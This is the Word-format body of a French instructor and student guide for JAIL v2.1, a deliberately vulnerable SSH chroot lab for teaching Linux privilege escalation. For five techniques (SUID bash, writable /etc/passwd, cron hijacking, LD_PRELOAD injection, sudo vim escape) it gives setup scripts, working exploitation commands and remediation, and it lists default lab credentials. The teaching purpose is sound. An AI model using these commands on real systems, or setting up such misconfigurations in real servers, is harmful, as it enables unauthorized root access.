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JAIL v2.1 — Laboratoire de Privilege Escalation Linux</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="646464"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Guide pedagogique complet pour formateurs et eleves</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="C83232"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Usage strictement reserve a un lab isole / CTF interne</w:t>
        <w:br/>
        <w:t>Ref. : Art. 323-1 du Code penal — ANSSI Guide Hygiene v3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>1. Presentation du lab</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>JAIL v2.1 est un environnement chroot SSH vulnerable concu pour l'apprentissage des techniques d'elevation de privileges sous Linux. L'utilisateur "jailed" est enferme dans un chroot via la configuration SSH (Match User + ChrootDirectory) avec un jeu limite de binaires. L'isolation repose entierement sur le ChrootDirectory SSH, pas sur un shell restreint.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Le lab couvre 5 techniques de privilege escalation :</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - SUID Bit Exploitation</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - Writable /etc/passwd</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - Cron Job Hijacking</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - LD_PRELOAD Injection</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - Sudo + Vim Escape</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>2. Installation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Prerequis : Debian 11/12 (installation minimale), acces root.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Etapes d'installation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>su -</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>apt update &amp;&amp; apt upgrade -y</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>apt install git dos2unix -y</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>cd /opt &amp;&amp; git clone https://github.com/Slurptheworld/Jail.git</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>cd Jail &amp;&amp; dos2unix *.sh &amp;&amp; chmod +x *.sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>./setup_jail.sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Note : </w:t>
      </w:r>
      <w:r>
        <w:t>Le script setup_jail.sh installe automatiquement les dependances manquantes (vim, python3, gcc) et configure le chroot SSH (bloc Match User dans sshd_config). Aucune configuration manuelle n'est necessaire.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>3. Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Structure du chroot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>/home/jailed/           # Racine du chroot (ChrootDirectory)</w:t>
        <w:br/>
        <w:t xml:space="preserve">  bin/                  # bash, ls, cat, mkdir, rm, touch,</w:t>
        <w:br/>
        <w:t xml:space="preserve">                        # python3, vim, env, find, grep, chmod,</w:t>
        <w:br/>
        <w:t xml:space="preserve">                        # id, whoami, su, gcc</w:t>
        <w:br/>
        <w:t xml:space="preserve">  lib/ &amp; lib64/         # Bibliotheques dynamiques (arborescence reelle)</w:t>
        <w:br/>
        <w:t xml:space="preserve">  etc/                  # passwd, group, shadow, sudoers, pam.d, cron.d</w:t>
        <w:br/>
        <w:t xml:space="preserve">  tmp/                  # Zone d'ecriture pour les exploits</w:t>
        <w:br/>
        <w:t xml:space="preserve">  proc/                 # Monte par vuln_sudo_vim.sh</w:t>
        <w:br/>
        <w:t xml:space="preserve">  dev/                  # null, tty, urandom</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Mecanisme de chroot SSH</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">IMPORTANT : </w:t>
      </w:r>
      <w:r>
        <w:t>L'isolation de l'utilisateur jailed repose entierement sur le ChrootDirectory SSH. L'utilisateur a un shell bash standard (/bin/bash). C'est la directive ChrootDirectory dans sshd_config qui enferme l'utilisateur dans /home/jailed lors de la connexion SSH. Aucun shell restreint (rbash) n'est utilise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Configuration ajoutee dans /etc/ssh/sshd_config :</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  Match User jailed</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ChrootDirectory /home/jailed</w:t>
        <w:br/>
        <w:t xml:space="preserve">      ForceCommand /bin/bash</w:t>
        <w:br/>
        <w:t xml:space="preserve">      AllowTcpForwarding no</w:t>
        <w:br/>
        <w:t xml:space="preserve">      X11Forwarding no</w:t>
        <w:br/>
        <w:br/>
        <w:t>Prerequis du ChrootDirectory :</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - /home/jailed et tous ses parents doivent appartenir a root:root</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - /home/jailed doit etre en 755 (pas d'ecriture par groupe/others)</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - ForceCommand pointe vers /bin/bash (chemin DANS le chroot)</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - SSH est redemarre apres modification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>4. Identifiants</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2880"/>
        <w:gridCol w:w="2880"/>
        <w:gridCol w:w="2880"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Utilisateur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Mot de passe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Acces</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>jailed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>password123</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>SSH -&gt; Chroot (/bin/bash)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>Connexion : ssh jailed@&lt;IP_DEBIAN&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>5. Vulnerabilites &amp; Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C89600"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>ROLES — Formateur vs Eleve</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C83232"/>
        </w:rPr>
        <w:t xml:space="preserve">FORMATEUR (root sur Debian) : </w:t>
      </w:r>
      <w:r>
        <w:t>Active les vulnerabilites cote serveur avec les scripts vuln_*.sh. Il prepare l'environnement AVANT que l'eleve ne se connecte.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="329632"/>
        </w:rPr>
        <w:t xml:space="preserve">ELEVE (SSH en tant que jailed) : </w:t>
      </w:r>
      <w:r>
        <w:t>Se connecte en SSH (ssh jailed@&lt;IP&gt;) et doit decouvrir puis exploiter les failles sans connaitre les scripts. Outils disponibles : find, grep, id, whoami, sudo -l, ls -la.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.1 SUID Bit Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Theorie : Quand un binaire possede le bit SUID, il s'execute avec les droits de son proprietaire (root). Si /bin/bash est SUID root, -p preserve les privileges.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Activation (formateur) : </w:t>
      </w:r>
      <w:r>
        <w:t>sudo ./vuln_suid.sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Exploitation (eleve) :</w:t>
        <w:br/>
        <w:t xml:space="preserve">  1. find / -perm -4000 -type f 2&gt;/dev/null</w:t>
        <w:br/>
        <w:t xml:space="preserve">  2. /bin/bash -p</w:t>
        <w:br/>
        <w:t xml:space="preserve">  3. whoami  # root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation : </w:t>
      </w:r>
      <w:r>
        <w:t>Ne jamais SUID les shells. Auditer avec find. Utiliser capabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.2 Writable /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Theorie : Si /etc/passwd est modifiable, on peut ajouter un compte UID 0 sans mdp.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Activation (formateur) : </w:t>
      </w:r>
      <w:r>
        <w:t>sudo ./vuln_passwd.sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Exploitation (eleve) :</w:t>
        <w:br/>
        <w:t xml:space="preserve">  1. ls -la /etc/passwd</w:t>
        <w:br/>
        <w:t xml:space="preserve">  2. echo 'hacker::0:0:hacker:/root:/bin/bash' &gt;&gt; /etc/passwd</w:t>
        <w:br/>
        <w:t xml:space="preserve">  3. su hacker  # root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation : </w:t>
      </w:r>
      <w:r>
        <w:t>chmod 644 /etc/passwd. Surveillance d'integrite (AIDE, OSSEC).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.3 Cron Job Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Theorie : Un cron root executant un script modifiable permet l'injection de code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Activation (formateur) : </w:t>
      </w:r>
      <w:r>
        <w:t>sudo ./vuln_cron.sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Exploitation (eleve) :</w:t>
        <w:br/>
        <w:t xml:space="preserve">  1. cat /etc/cron.d/vuln_cron</w:t>
        <w:br/>
        <w:t xml:space="preserve">  2. Ecrire un script qui copie bash en SUID dans /tmp/rootbash</w:t>
        <w:br/>
        <w:t xml:space="preserve">  3. Attendre 60 sec, puis /tmp/rootbash -p</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation : </w:t>
      </w:r>
      <w:r>
        <w:t>Fichiers cron 644 root. Scripts immutables. Chemins absolus.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.4 LD_PRELOAD Injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Theorie : LD_PRELOAD force le chargement d'une lib avant toutes les autres. Avec un binaire SUID (env), on injecte _init() -&gt; shell root.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Activation (formateur) : </w:t>
      </w:r>
      <w:r>
        <w:t>sudo ./vuln_ldpreload.sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Exploitation (eleve) :</w:t>
        <w:br/>
        <w:t xml:space="preserve">  1. Creer exploit.c avec _init() -&gt; setuid(0) + system("/bin/bash")</w:t>
        <w:br/>
        <w:t xml:space="preserve">  2. gcc -fPIC -shared -o /tmp/exploit.so exploit.c -nostartfiles</w:t>
        <w:br/>
        <w:t xml:space="preserve">  3. env LD_PRELOAD=/tmp/exploit.so /bin/ls  # root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation : </w:t>
      </w:r>
      <w:r>
        <w:t>Pas de SUID sur env. Restreindre gcc. Compilation statique.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.5 Sudo + Vim Escape</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Theorie : Si sudo autorise vim en root (sudoers NOPASSWD), Vim permet un escape to shell avec :shell ou :!/bin/bash. Ref: GTFOBins.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Activation (formateur) : </w:t>
      </w:r>
      <w:r>
        <w:t>sudo ./vuln_sudo_vim.sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Ce script installe dans le chroot :</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - sudo (binaire SUID)</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - PAM (pam_permit.so)</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - NSS (nsswitch.conf + libnss_files)</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - /etc/passwd, /etc/group, /etc/shadow</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - /etc/sudoers + /etc/sudoers.d/vuln_vim</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - /proc (monte)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Exploitation (eleve) :</w:t>
        <w:br/>
        <w:t xml:space="preserve">  1. sudo -l  # reperer NOPASSWD: /bin/vim</w:t>
        <w:br/>
        <w:t xml:space="preserve">  2. sudo /bin/vim</w:t>
        <w:br/>
        <w:t xml:space="preserve">  3. :set shell=/bin/bash</w:t>
        <w:br/>
        <w:t xml:space="preserve">  4. :shell  # root</w:t>
        <w:br/>
        <w:br/>
        <w:t>Alternative : sudo vim -c ':!/bin/bash'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation : </w:t>
      </w:r>
      <w:r>
        <w:t>Ne jamais sudo sur des editeurs. Utiliser sudoedit. Consulter GTFOBins.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>6. Commandes de detection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Commandes disponibles dans le chroot :</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  find / -perm -4000 -type f 2&gt;/dev/null   # SUID</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ls -la /etc/passwd                       # Permissions</w:t>
        <w:br/>
        <w:t xml:space="preserve">  cat /etc/cron.d/*                        # Crons</w:t>
        <w:br/>
        <w:t xml:space="preserve">  sudo -l                                  # Droits sudo</w:t>
        <w:br/>
        <w:t xml:space="preserve">  id / whoami                              # UID courant</w:t>
        <w:br/>
        <w:t xml:space="preserve">  grep -r "pattern" /etc/                  # Configs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>7. Nettoyage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Apres le TP :</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  sudo ./cleanup_jail.sh</w:t>
        <w:br/>
        <w:br/>
        <w:t>Actions :</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - Demontage /proc</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - Suppression utilisateur jailed</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - Suppression /home/jailed</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - Suppression Match User dans sshd_config + restart SSH</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - Suppression sudoers vulnerables</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - Nettoyage crons et SUID suspects</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C83232"/>
        </w:rPr>
        <w:t xml:space="preserve">IMPORTANT : </w:t>
      </w:r>
      <w:r>
        <w:t>Ne jamais laisser un environnement vulnerable actif au-dela du TP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>8. Ressources</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>GTFOBins : https://gtfobins.github.io/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>HackTricks : https://book.hacktricks.xyz/linux-hardening/privilege-escalation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>MITRE ATT&amp;CK : https://attack.mitre.org</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>ANSSI Guide Hygiene v3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